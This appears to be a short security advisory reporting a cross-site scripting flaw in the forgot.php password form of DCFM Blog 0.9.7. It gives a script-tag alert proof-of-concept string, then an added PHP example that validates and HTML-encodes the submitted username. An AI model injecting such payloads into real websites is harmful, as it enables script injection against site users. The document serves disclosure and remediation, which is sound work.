DCFM Blog 0.9.7 XSS Attack
===========================
Discovered by N_A , N_A[at]tutanota.com
========================================
Description
============
Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.
https://sourceforge.net/projects/dcfm-blog/
Vulnerability
=============
The forgot.php file in DCFM Blog 0.9.7 does not properly check input, and code injection is possible.
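// Show the username form when no 'userf' value has been submitted.
if (!isset($_POST['userf'])) {
    echo "<form action='forgot.php' method='post'>
    Please provide your username:
    <input type='text' name='userf' />
    <br /><br /><input type='submit' value='Get my Password' />
    </form>";
}
// The code that handles a submitted 'userf' value is not part of this excerpt.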
Proof Of Concept String
========================
<script>alert('XSS');</script>
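
A hardened way to handle the submitted username, as an added example that is not DCFM Blog code and not from the original advisory. It assumes forgot.php writes the 'userf' value back into the HTML response (that branch is not shown above); the function names, the allowlist pattern and the response text are hypothetical.

```php
<?php
// Added example, not DCFM Blog code. Assumption: the submitted 'userf'
// value is reflected into the HTML response. Written for PHP 5.4 or later.

// Hypothetical helper: encode a value for an HTML text or attribute context.
function h($value)
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical allowlist: letters, digits, underscore, dot, hyphen; 1-32 chars.
function is_valid_username($value)
{
    return is_string($value)
        && preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $value) === 1;
}

// Hypothetical replacement for the branch that handles a submitted username.
function render_forgot_response(array $post)
{
    $userf = isset($post['userf']) ? $post['userf'] : null;
    if (!is_valid_username($userf)) {
        // Reject without echoing the raw value back to the browser.
        return '<p>Invalid username.</p>';
    }
    // Encode on output even after validation, so a later change to the
    // allowlist cannot reintroduce the injection.
    return '<p>If the account ' . h($userf)
        . ' exists, a reset message has been sent.</p>';
}

// Constructed sample inputs: a normal name, the proof-of-concept string
// from this advisory, and a non-string value (userf[]=x style submission).
$samples = array('alice', "<script>alert('XSS');</script>", array('x'));
foreach ($samples as $sample) {
    echo render_forgot_response(array('userf' => $sample)), PHP_EOL;
}

// Output encoding on its own also turns the string into inert text.
echo h("<script>alert('XSS');</script>"), PHP_EOL;
```

The allowlist should match whatever usernames the registration code actually accepts; the output encoding is the part that must stay regardless.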
Email
=====
N_A[at]tutanota.com